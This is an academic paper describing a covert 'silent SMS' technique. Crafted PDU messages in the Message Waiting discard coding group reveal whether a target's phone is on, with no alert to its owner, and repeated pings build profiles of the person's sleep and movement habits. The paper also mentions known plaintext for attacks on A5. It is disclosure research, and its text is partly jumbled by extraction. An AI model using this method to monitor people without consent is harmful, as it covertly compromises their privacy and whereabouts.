A Plain Type of Mobile Attack:
Compromise of User’s Privacy through a
Simple Implementation Method
Iosif Androulidakis
Chris Basios
Network Operations Center
University of Ioannina
University Campus
451-10 Dourouti,
GREECE
sandro@noc.uoi.gr
Computer Networks Laboratory
National Technical Univ. of Athens
Heroon Politechneiou 9
151-22 Zografou,
GREECE
cbas@telecom.ntua.gr
Abstract-An easy way to determine the state of a cell phone
without the owner’s knowledge is presented in this paper. The
described method, combined with a form of patterning mobile
user’s behavior (in terms of evaluating the mobile phone’s state
in a tactical way) could lead to privacy compromise revealing
his whereabouts. The technical part of the paper is based on
the Short Messaging Service and the offered service of Receipt
Report, manipulated in such a way as not to reveal any
information to the targeted user. In addition, this method can
provide known plain texts for an attack on A5.
Keywords-GSM,
Security, Privacy, DoS
SMS, Ping, Monitoring, Mobile
monitor the state of the phone and revealing the user’s basic
social habits, without affecting its mobile operation and of
course without any visual or sound alert towards him.
In order to investigate the users’ concerns regarding
the aforementioned and additional issues, we conducted a
survey among 442 students in the University of Ioannina,
Greece. The results of the survey, which are relevant to our
presented work, are shown later in the paper.
The rest of this paper is organized as follows: in
section 2 we present an overview of GSM and SMS system
architecture; section 3 comprises the implementation issues
of our technique, while in section 4 the results of our study
are shown. Finally, in section 5 we conclude with some
general remarks and our future work intentions.
I. INTRODUCTION
Nowadays, cellular networks have become a
critical component of the economic and social
infrastructures in our lives and almost everybody in
developed countries owns a personal cell phone. In addition
to voice and other mobile services, telecom providers
deliver, in a daily basis, a vast number of text messages to
the majority of the subscribers, making this particular
service (SMS) so popular, especially between certain user
groups (i.e. youth), that can, in a way, determine the user’s
social profile [1],[2]. Despite of this popularity, it is also
known that certain places (i.e. elevators, subways, tunnels,
mountains etc) are inherently out of network reach, while
others (i.e. populated areas) may present a permanent
bottleneck leading in a delayed delivery of short messages.
Based on these observations, we demonstrate a
method in order to monitor the state of a mobile phone
without the knowledge of the affected user that can lead to a
compromise of his privacy and a partial reveal of his
whereabouts. The proposed technique uses the Short
Messaging Service (SMS) and the relevant Receipt Report
in order to determine the state of the phone and can be
compared to the computers’ operating system command
‘ping’, which in its simplest form informs the user whether a
computer in the network is ‘alive’ or not. The GSM
metaphor of the ping command is achieved using an
especially crafted SMS (in PDU form), making it possible to
II. GSM AND SMS ARCHITECTURE OVERVIEW
A. GSM Architecture
The GSM technical specifications [3] define the
different entities that form the GSM network by defining
their functions and interface requirements. The GSM
network can be divided into four main parts:
The Mobile Station (MS).
The Base Station Subsystem (BSS).
The Network and Switching Subsystem (NSS).
The Operation and Support Subsystem (OSS).
The architecture and the main components of the
GSM network are presented in Fig. 1.
Authorized licensed use limited to: University of Ioannina. Downloaded on March 14, 2009 at 06:03 from IEEE Xplore. Restrictions apply.
Figure 1. Architecture of the GSM network
B. SMS Architecture
Short Message Service [4] is a mechanism of
delivery of short messages over the mobile networks. It is a
store and forward way of transmitting messages to and from
mobiles. The message from the sending mobile is stored in a
central short message center (SMS) which then forwards it
to the destination mobile. This means that in the case that
the recipient is not available, the short message is stored and
can be sent later. Each short message can be no longer than
160 characters, while these characters can be text
(alphanumeric) or binary Non-Text Short messages.
An interesting feature of SMS is return receipts.
This means that the sender, if wishes, can get a small
message notifying if the short message was delivered to the
intended recipient. Since SMS used signaling channel as
opposed to dedicated channels, these messages can be
sent/received simultaneously with the voice/data/fax service
over a GSM network. In addition, SMS supports national
and international roaming. This means that you can send
short messages to any other GSM mobile user around the
world. With the PCS networks based on all the three
technologies, GSM, CDMA and TDMA supporting SMS,
SMS is more or less a universal mobile data service.
The next figure shows a typical SMS flow diagram.
to the destination MS in the format of an ‘SMS-DELIVER’.
The structures of ‘SMS-SUBMIT’ and ‘SMS-DELIVER’
messages are different, but still adhere to a public standard
and an SMS-SUBMIT’s corresponding SMS-DELIVER is
largely predictable (the time stamp on an SMS-DELIVER is
roughly, but not exactly predictable). In addition, the format
of a report -a sender can ask for- is also known and contains
a time stamp. Pinging a user’s mobile phone without any
type of notification (using our technique) coupled with the
aforementioned predictability can be a helper in order to
mount an attack on A5. This technical issue has already
been noted by Steve Lord: “It is possible to send certain
SMS messages that will not alert the end-subscriber, but will
still return a delivery report – providing known plain texts
for an attack on A5” [7].
C. PDU Mode
The SMS message, as specified by the ETSI
organization ([4]), can be up to 160 characters long, where
each character is 7 bits according to the 7-bit
default alphabet. 8-bit messages (max 140 characters) are
usually not viewable by the phones as text messages; instead
they are used for data in e.g. smart messaging (images
and ringing tones) and OTA provisioning of WAP settings.
16-bit messages (max 70 characters) are used for Unicode
(UCS2) text messages, viewable by most phones.
There are two ways of sending and receiving SMS
messages:
by text mode
by PDU (Protocol Description Unit) mode
The text mode (unavailable on some phones) is
just an encoding of the bit stream represented by the PDU
mode. The PDU mode (the mode we used in our work) can
send binary information in 7-bit or 8-bit format.
1) Sending a message in the PDU mode:
The following example shows how to send the
message "hellohello" in the PDU mode [5] (which was
selected to be our preferred mode of sending the messages)
from a cell phone adhering to the AT commands set:
AT+CMGF=0 //Set PDU mode
AT+CSMS=0
//Check if modem supports SMS
commands
AT+CMGS=23
//Send message, 23 octets
(excluding the initial 00)
>0011000B916407281553F80000AA0AE8329BFD4697D9
EC37
Figure 2. SMS routing flow diagram
It is, also, worth mentioning that SMS by default is
sent in clear text form, in a predictable format. When an
SMS is sent from an MS to a Service Center it is in ‘SMSSUBMIT’ format. The Service Center then sends a message
We should note that there are 23 octets in this
message (46 'characters'), as the first octet ("00") doesn't
count (it is only an indicator of the length of the SMSC
information supplied (0)). Table 1 shows all the PDU string
octets.
Authorized licensed use limited to: University of Ioannina. Downloaded on March 14, 2009 at 06:03 from IEEE Xplore. Restrictions apply.
TABLE III. DESCRIPTION OF ‘3…0’ BITS OF THE ‘1101’ CODING
GROUP
TABLE I. DESCRIPTION OF OCTETS IN A PDU MODE SMS
Octets
00
11
00
0B
91
6407281553F8
00
00
AA
0A
E8329BFD4697D9EC37
Description
Length of SMSC information
1st octet of the SMS-SUBMIT
message
TP-Message-Reference
Address-Length
Type-of-Address
The phone number in semi octets
(46708251358)
TP-PID (Protocol Identifier)
TP-DCS (Data Coding Scheme)
TP-Validity period (‘AA’ means
4 days)
TP-User-Data-Length (Length of
message)
TP-User-Data (These octets
represent
the
message
"hellohello")
2) Data Coding Scheme:
The TP-DCS field, as defined in [4], indicates the
data-coding scheme of the TP-UD field and may, also,
indicate a message class. The octet is used according to a
coding group which is indicated in bits ‘7…4’. In the next
Table, the possible coding combinations of the octet are
presented in an abstraction way (further details would be out
of the scope of this paper).
Bits
3
2
State
0
1
0
10
00
01
10
11
Description
Set Indication Inactive
Set Indication Active
Bit 2 is reserved and set
to 0
Voicemail Message
Waiting
Fax Message Waiting
Electronic Mail Message
Waiting
Other Message Waiting
III. METHODOLOGY
As it was previously noted, we have to send to the
other party an especially crafted short message. The easiest
way to do that is by connecting any cell phone to a personal
computer or a laptop and by using the cell phone as a
terminal in order to access the network and send the
message. For the shake of simplicity, we used a standard cell
phone with a cheap serial cable that connects the phone to
the serial port of the PC (Fig. 3).
TABLE II. DESCRIPTION OF ‘7…4’ CODING GROUP OF BITS
Coding Group Bits ‘7…4’
00xx
0100…1011
1100
1101
1110
1111
Description
General Data Coding indication (text
compression, alphabet being used
etc.)
Reserved Coding Groups
Message Waiting Indication Group:
Discard Message
Message Waiting Indication Group:
Store Message
Message Waiting Indication Group:
Store Message (the text included in
the user data is coded in the
uncompressed UCS2 alphabet)
Data coding/message class
We are particularly interested in the ‘1100’ coding
group, as it was the one we used in order to prevent the user
from being notified upon any SMS reception originated
from our implementation work plan. In particular, this group
allows an indication to be provided to the user about status
of types of message waiting on systems connected to the
GSM PLMN.
The next Table presents in further detail the Bits
‘3…0’ of the particular coding group.
Figure 3. Implementation layout
The simplest way of communicating with the cell
phone through the serial cable is by using ‘HyperTerminal’,
a tool for Microsoft Windows OS that can be used to
connect to other computers using a variety of protocols. In
our case we used it to access the serial port COM1, which
was the serial port of the computer that the mobile phone
was attached to. Obviously, someone could use COM2 or
any other mapped serial port.
This connection gives access to the cell phone’s
modem so the user can issue AT commands [6]. In order to
support the configuration of the modem for each connection,
Hayes developed the AT command set, which allows to
inform the modem which functions and modes to use when
initializing a connection. Apart from the standard AT
command set, mobile phone’s modems use a superset of it
providing many more options. All the aforementioned
commands are described in [7].
In order to automate the process and gate readings,
we wrote a small program in Basic taking care of the
communication issues and the logging of the network
responses. The output of the program is shown in the
appendix.
Authorized licensed use limited to: University of Ioannina. Downloaded on March 14, 2009 at 06:03 from IEEE Xplore. Restrictions apply.
Our work was mainly based on the extended AT
command which gives access to the SMS in order to send
messages, that is AT+CMGS. Finally, there were also
available some device-specific AT command sets, provided
by the manufacturers, that can be only used in the relevant
phones, but such functionality was not needed.
Having described both software and hardware
issues, we can proceed to the implementation itself. As you
can recall from the previous section, we have to construct
the appropriate PDU. The specific field that makes our
approach possible is the ‘TP-Data-Coding-Scheme’ field
(see section 2.3.2). We used the ‘Message Waiting
Indication Group: Discard Message’ and in particular, the
bit that switches off the indicator along with the coding that
does not save the message to the mobile phone.
To sum up, we are sending a special short message
that instructs the cell phone to switch off the indicator of
‘Fax waiting’ (in order to prevent the user’s notification)
and to discard the message itself. A user has almost never
used the particular service (and so the indicator would be
switched off anyway). Nevertheless, we are switching off
the indicator so as to prevent any notification.
There are, also, alternative services (including
‘Voice mail’ indicator, ‘E-mail’ indicator etc.) that can be
used in a relevant way, but there are not quite suitable for
our purpose, because most of the times their use is
accompanied by visual or sound alerts, informing the user
about the arriving message.
In order to demonstrate our tests we used a
‘Siemens S55’ cell phone, as the originating mobile and
quite many cell phone targets. It must be noted that we did
not find a single cell phone that did not comply to our
testing. That is, all of them did not provide any visual or
sound indication of the ‘attack’ taking place. The originating
network being used was the one of Vodafone GR and the
targeted cell phones were using Vodafone GR, Cosmote and
WIND GR (the 3 main mobile service providers in Greece).
It is worth mentioning that the ordinary messages
remain in the SMSC buffer when the target device’s
message buffer is full. This occurs, as noted in the GSM
standards, when the mobile phone returns a Mobile-StationMemory-Capacity-Exceeded-Flag to the HLR. However, the
type of messages we are using is not occupying any
memory, as it is merely an indicator so we did not face any
difficulties towards this issue when implementing our
technique.
A. User Profile Patterning Issue
It has been remarked by many experts that the
expanded or enhanced social networks afforded by mobile
phones has created a new sense of identity for various
groups of people, e.g. teenagers. At the same time, the
highly personalized nature of the mobile phone has meant
that its form and use have become important aspects of the
individuality of a phone user.
Thus, social identity [8] and profile patterning tend
to become fundamental for the development of the future
mobile information society; the right balance between the
release of a user’s identity and the protection of his/her
privacy needs to be struck early in the development of
commercial services.
In our attempt to reveal some habitual
characteristics of the user and configure some of his/her
generic profile matters we depict quite many sequential
indications of the user’s mobile phone as an
acknowledgment to our sms ‘hits’. In the next figure a
schematic paradigm is given (all the relevant data can be
provided in related databases). The blue dots represent the
‘On’ indications of the target mobile, while the red dots
represent the ‘Off’ indications. Someone can, also, notice
the exact times of the sms receptions.
Figure 4.
Representative On/Off indications concerning the state of the mobile phone
(1 min spacing)
In the next figure a more cumulative pattern is
depicted (all the relevant data can be provided in related
databases), focusing on the user’s night rest and morning
awakening hours. By sending a message every 30 min. we
depict a representative diagram for a weekly user profile.
IV. RESULTS
The results are divided in 2 categories concerning
both compromise of privacy and denial of service issues and
we conclude this section with a cost analysis according to
our implementation criteria.
Authorized licensed use limited to: University of Ioannina. Downloaded on March 14, 2009 at 06:03 from IEEE Xplore. Restrictions apply.
representative set in a certain age area (18-24), which
corresponds to a major percentage of active mobile users.
The next figure depicts the results coming out of all
the responds regarding the question: “How concerned are
you about the possibility that someone else is persistently
aware of your mobile’s mode (switched on/off)?”.
Figure 6. Level of concern regarding the possibility that someone else is
aware of the user’s mobile mode (on/off)
Figure 5. Weekly pattering of user’s profile (30 min spacing)
The results are very interesting as they provide a
means of explaining a user’s everyday or weekly habits. For
example, figure 5 clearly shows that the certain user
switches off his/her mobile for the night rest. Although,
he/she has a quite stable time for doing that before every
working day (Monday-Friday), this situation is altered for
Friday and, especially, Saturday. One could claim that there
is nothing new in this kind of information, but we believe
that the technique can give additional and useful results
when used for certain time periods and groups of people.
By using this method one can retrieve valuable
information about the social profile of a certain user. For
example, we can perceive information about someone’s
(everyday) habits, i.e. if he/she switches off his/her mobile
for resting (noon or/and night) and if so, how long he/she,
usually, rests.
Furthermore, all these information can be provided
for a potential statistical analysis for a certain group under
examination (e.g. utilization of mobile phones among young
students). Additionally, supervisors, educators or other
professionals in order to analyze or examine the work
efficiency/concentration of an individual can use this kind of
patterns.
In order to testify the affect of such an ‘intrusion’
to mobile users, we evaluated the concern level of 442
mobile users regarding various security issues, including ‘a
third party’s awareness of the user’s mobile mode (on/off)’.
The survey was conducted using in-person delivery
technique, while all the respondents were students in
University of Ioannina, Greece. Targeting such a group is
due to the fact that we wanted the participants to form a
The results coming out of figure 6 are really
interesting; almost 1 out of 3 of the respondents are
extremely concerned about the possibility that a third party
knows when they have switched on/off their mobile, while
another 15% is very concerned about this same issue.
V. CONCLUSIONS
According to our study, it is shown that it is
possible to monitor the whereabouts of a cell phone user
based on the ‘behavior’ of his phone. It is also worthmentioning that this simple implementation method can
provide
known plain texts for an attack on A5. The technique under
evaluation is fairly easy and doesn’t need any special
equipment or the intervention of an “insider”. By patterning
the everyday use of a phone (making use of the described
technique), one can easily determine essential facts about
the life of the owner (i.e. wake-up and sleep time, being in
different places than usually for certain times of the day etc.)
and thus compromising his privacy.
REFERENCES
[1]. Susanna Hedbring, ‘Mobile Messaging Usability Social and Pragmatic Aspects’, Technical Report,
April 2002
[2]. J. V. D. Bulck, ‘Text messaging as a cause of sleep
interruption in adolescents, evidence from a crosssectional study’, Journal of Sleep Research, 12(3),
pp. 263, September 2003
[3]. Digital cellular telecommunications system (Phase
2+); General description of a GSM Public Land
Mobile Network (PLMN) (GSM 01.02 version
Authorized licensed use limited to: University of Ioannina. Downloaded on March 14, 2009 at 06:03 from IEEE Xplore. Restrictions apply.
[4].
[5].
[6].
[7].
[8].
6.0.1 Release 1997), ETSI TS 101 622 V6.0.1
(2001-02)
Digital cellular telecommunications system (Phase
2+); Technical realization of the Short Message
Service (SMS) Point-to-Point (PP) (3GPP TS 03.40
version 7.5.0 Release 1998), ETSI TS 100 901
V7.5.0 (2001-12)
http://www.dreamfabric.com/sms/
G. Held, ‘The Complete Modem Reference’, John
Wiley & Sons, Inc., 1991
3GPP 27.007 AT command set for 3G User
Equipment, Release 27007-680, 4 April 2005
Anna Truch and Michael Hulme, ‘Exploring the
implications for social identity of the new
sociology of the mobile phone’, in Proceedings of
‘The Global and Local in Mobile Communication:
Places, Images, People, and Connections’,
Budapest, 10-11 June 2004
Authorized licensed use limited to: University of Ioannina. Downloaded on March 14, 2009 at 06:03 from IEEE Xplore. Restrictions apply.